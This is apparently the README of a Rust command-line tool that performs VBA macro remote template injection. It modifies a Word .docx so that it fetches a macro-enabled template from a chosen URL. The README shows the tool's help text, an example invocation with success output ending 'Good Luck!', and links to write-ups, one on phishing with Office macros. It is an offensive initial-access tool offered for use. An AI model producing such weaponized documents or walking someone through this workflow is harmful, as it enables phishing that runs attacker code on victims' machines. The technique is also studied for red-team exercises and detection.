VBA Macro Remote Template Injection written in Rust
❯ remote-template-injector -h
VBA Macro Remote Template Injection written in Rust
Usage: remote-template-injector --url <URL> --file <FILE> --output <OUTPUT>
-u, --url <URL> Template URL
-f, --file <FILE> File to be injected
-o, --output <OUTPUT> Output location of modified docx file
-h, --help Print help
-V, --version Print version
❯ remote-template-injector -f /path/to/file.docx -u -o /path/to/output.docx
Editing remote template url...
Word successfully injected. Generated file: /path/to/output.docx
Good Luck!
- https://john-woodman.com/research/vba-macro-remote-template-injection/
- https://blog.sunggwanchoi.com/remote-template-injection/
- https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros
MIT License